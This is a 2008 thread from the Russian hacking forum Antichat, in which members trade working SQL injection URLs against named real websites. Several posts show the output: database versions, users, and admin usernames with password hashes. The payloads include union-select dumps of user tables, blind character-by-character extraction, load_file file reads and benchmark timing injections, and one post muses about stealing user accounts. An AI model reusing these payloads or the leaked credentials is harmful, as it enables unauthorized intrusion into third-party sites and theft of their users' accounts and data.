Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
01.05.2008, 02:00
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
Код:
http://www.gamershood.com/game.php?id=769+and+1=2+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+user+where+userid=21000--
|
|
|
01.05.2008, 09:09
|
|
Участник форума
Регистрация: 19.01.2008
Сообщений: 111
Провел на форуме:
769380
Репутация:
73
|
|
_http://oke.ru/xo4u.php?id=-42708'+union+select+1,2,3,4,5,6,7,8,9,10/*
|
|
|
|
01.05.2008, 15:31
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Помогите с иньекцией ниче не получаеться http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14/*
|
|
|
|
01.05.2008, 16:41
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776
Репутация:
93
|
|
http://www.atrium-centr.ru/ncatalog/?id=80&position=-1078+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,concat_ws(0x2,version(),data base(),user()),23,24--
version: 4.0.24_Debian-10sarge1
bd: atrium
user: root@localhost
admin: login: admin
pass_hash: 74aff5cad73b7d1b587fe5a4fe5288d8
mysql.user:
1. root 001c591f0180a0db
2. root 404a5bc542945739
3. sys 42317d1c50e8dbb6
Последний раз редактировалось .acme; 01.05.2008 в 16:44..
|
|
|
|
02.05.2008, 01:00
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Код:
http://www.vlankas.ru/~bark/modules/myarticles/topics.php?op=listarticles&topic_id=-2%20union%20select%201,2,concat_ws(0x3a,uname,pass),4,5,6%20from%20runcms_users+limit+0,1
itman:bfc4c35ff54e5ff14f899eaf0b312d0c
Код:
http://www.cumaroua.net/index.php?option=com_jooget&Itemid=1&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*
admin:dc85333ba761e84fc1becd24397ba39e |
|
|
|
02.05.2008, 11:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
краткий обзор багов гохи:
1) посимвольный брут с этого нс:
Код:
http://wow.ru/c/pagecont/?id=2241+and+ascii(lower(substring(user(),4,1)))%3C=97
Код:
1-103 g
2-111 o
3-104 h
4-97 a
5-95 _
6-103 g
7-111 o
8-104 h
9-97 a
10-115 s
11-64 @
12 49 1
...
2)reverse-ip=>
Код:
http://news.goha.ru/c/pagecont/?id=2217+order+by+4/*
-//-
3)однако, есть и не посимвольный брут, причем где то ковычки фильтруются:
Код:
http://eq2.goha.ru/c/pagecat/show_image/?action=show_image&id=999+union+select+load_file('/lala'),2,3,4+from+information_schema.tables/*
4).. а где то нет:
Код:
http://www.list.goha.ru/suggest-link.php?id=0'+union+select+1,load_file('/lala'),3,4,5,6,7,8,9,10,11,12,13,14,15/*
или даже так (вывод в исходниках):
Код:
http://eq2.goha.ru/c/pagecat/show_image/?action=show_image&id=999+union+select+concat(0x3b,table_name,table_schema),2,3,4+from+information_schema.tables/*
6)причем бага с посимвольным брутом распостранена на нескольких ресурсах гохи:
Код:
http://lineage2.ru/c/pagecont/?id=2761-1
сколько акков с оффа можно увести, получив доступ к личкам пользователей - решать вам, и помните о неправомерном доступе к закрытой информации=). |
|
|
|
02.05.2008, 20:16
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Лично меня с лайнэйдж редиректит =)
http://lineage2.ru/c/pagecont/?id=2760+and+substring(version(),1,1)=5
А вот:Р
http://lineage2.ru/c/pagecont/?id=2760+or+2760=if(ascii((select+user()))>=254,1, 0,benchmark(2999999,md5(now()))
Если вместо 254 вписать 280 или больше всё равно возвращает 1,или запрос непральный,бес понятия)
http://lineage2.ru/c/pagecont/?id=2760+order+by+4/*
http://lineage2.ru/c/pagecont/?id=2760+union+select+1,2,3,4/*
Фильтрация или запрос неверный)
http://lineage2.ru/c/pagecont/?id=2760+union+select+0x277461626C655F6E616D6527,2 ,3,4+0x66726F6D+information_schema.tables/*
Чойто не выходит: )
Последний раз редактировалось Велемир; 02.05.2008 в 21:23..
|
|
|
|
03.05.2008, 00:23
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753
Репутация:
120
|
|
http://www.ufsa-tour.com.ua/news.php?news_id=-17+union+select+1,2,3,concat_ws(char(58),version() ,user(),database()),5,6/*
4.1.22-standard-log
ufsacom_usrufsa3@localhost
ufsacom_ufsa3
//*************************************
Страховая компания ВЕСКО
http://vesko.com.ua/news.php?news_ID=-328+union+select+1,2,user(),4,5,version()/*
4.1.22-log
news@hosting02.iptelecom.net.ua
news
//*************************************
http://www.bumexpress.com.ua/news.php?news_id=-122+union+select+1,2,user(),4,5,6,7,8,9,10,11/*
4.1.22
bumexpress@localhost
bumexpress
//************************************
http://kompan.altercon.com.ua/news.php?news=2&news_id=-3+union+select+1,user(),3,4,version(),6,database() ,8/*
4.1.22-log
altercon_det@viper
altercon_det
//************************************
Отель "РУСЬ" Киев
http://www.hotelrus.kiev.ua/ru/information/news/news.php?news_id=-2+union+select+1,user(),3,version(),5,6,7/*
5.0.22-standard
droopy_hotelrus@localhost
droopy_hotelrus
Блин в 12.00 вырубят инет
кому надо держите
http://www.master-stroy-yug.com.ua/news.php?news_id=22+order+by+1/*
http://www.cpc.com.ua/rus/news.php?news_id=11+order+by+100/*
не серчайте на меня за офтоп плиз
Славная сегодня была охота
Последний раз редактировалось neon_fx; 03.05.2008 в 01:01..
|
|
|
|
03.05.2008, 02:28
|
|
Познающий
Регистрация: 31.08.2006
Сообщений: 67
Провел на форуме:
377085
Репутация:
18
|
|
http://www.master-stroy-yug.com.ua/news.php?news_id=22+union+select+1,user(),version( ),4,5,6/*
админка тоже есть, но она походу пишет и взаимодействует с файлами а не базой..
5 ветка.
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,user(),version(),database(),5,6,7 ,8,9,10/*
5 ветка
http://www.mtas.ru/second.php?ID=-15+union+select+AES_DECRYPT(AES_ENCRYPT(version(), 0x71),0x71)/*
5 ветка
http://www.ciritas.ru/product.php?id=-2+union+select+1,2,3,4,version(),6,7,8,9/*
fадминка по ходу дело с базой повязана
4 ветка
http://www.clasp.org/publications.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15/*
первая версия 4 ветки кажись, дальше крутить охоты нету..
http://www.fondationbrigittebardot.fr/site/homepage.php?Id=2+union+select+1/*
фильтрация
http://www.gregorypacks.com/prod.php?ID=-2+order+select+1/*
здесь полная фильтрация.. Жесть 
http://www.eutrainingsite.com/open_details.php?id=2+group+by+55/*
не столько терпелив.. Думаю кому-нить пригодиться . 
Последний раз редактировалось Nekt; 03.05.2008 в 03:39..
|
|
|
|
03.05.2008, 11:05
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776
Репутация:
93
|
|
Извиняюсь за оффтоП, но
mtas.ru
encycl.anthropology.ru
ciritas.ru
clasp.org
fondationbrigittebardot.fr
gregorypacks.com
eutrainingsite.com
Баян. Юзайте поиск. |
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид